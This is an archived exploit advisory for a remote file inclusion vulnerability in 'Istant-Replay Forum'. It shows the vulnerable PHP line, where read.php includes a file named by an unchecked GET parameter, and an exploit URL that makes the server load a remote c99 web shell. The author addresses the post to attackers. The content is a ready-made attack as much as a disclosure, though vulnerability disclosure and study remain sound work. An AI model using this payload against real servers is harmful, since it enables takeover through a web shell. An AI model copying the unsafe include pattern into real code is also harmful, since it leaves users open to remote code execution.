AOH :: HP Unsorted R :: BX2821.HTM

remote file include



remote file include
remote file include



#########################################################################
        Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR: THuGM4N
## Email : Win32.exe@w.cn

## Script : Istant-Replay Forum

## Site : http://www.chattaitaliano.com

## Vulnerable CODE :
~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~
$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## BUT THE EXPLOIT IS LIKE THAT  :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?


##  BIGUP 2 All Attackers Around The World .

#########################################################################
      Istant-Replay Forum  Remote File Inclusion Vulnerability
#########################################################################


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.